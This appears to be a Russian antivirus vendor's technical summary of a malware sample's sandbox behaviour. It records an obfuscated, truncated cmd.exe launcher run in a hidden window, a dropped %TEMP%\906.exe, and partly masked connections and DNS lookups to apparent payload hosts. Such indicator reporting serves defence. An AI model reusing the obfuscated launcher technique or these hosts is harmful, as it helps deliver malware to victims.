Техническая информация
- '<SYSTEM32>\cmd.exe' /V/C"set ZvLG=XGrRjCXLUIWwIzZNUTWuYS}k.a;DVAmyg2Fc=3hni7vo@l,O6 :$/(e{tKQxb'Es8dp-B10Pf9)+\&&for %0 in (66,43,11,54,2,63,38,54,45,45,49,51,42,72,16,36,39,54,11,67,43,60,4,54,35,56,49,15,54,56,2...
- %TEMP%\906.exe
- %TEMP%\906.exe
- %TEMP%\906.exe
- 'ar###erseas.com':80
- 'ay###ya.co.jp':80
- 'ay###ya.co.jp':443
- 'ay###ya.co.jp':443
- DNS ASK ar###erseas.com
- DNS ASK ay###ya.co.jp
- DNS ASK ch#######rballtournament.com
- DNS ASK bo###eet.dance
- DNS ASK ha#####uhendislik.com
- ClassName: '' WindowName: '254'
- ClassName: '' WindowName: ''
- ClassName: '' WindowName: '0'
- ClassName: '' WindowName: '81695'
- ClassName: '' WindowName: ''
- ClassName: '' WindowName: '6863'
- '<SYSTEM32>\cmd.exe' /V/C"set ZvLG=XGrRjCXLUIWwIzZNUTWuYS}k.a;DVAmyg2Fc=3hni7vo@l,O6 :$/(e{tKQxb'Es8dp-B10Pf9)+\&&for %0 in (66,43,11,54,2,63,38,54,45,45,49,51,42,72,16,36,39,54,11,67,43,60,4,54,35,56,49,15,54,56,2...' (со скрытым окном)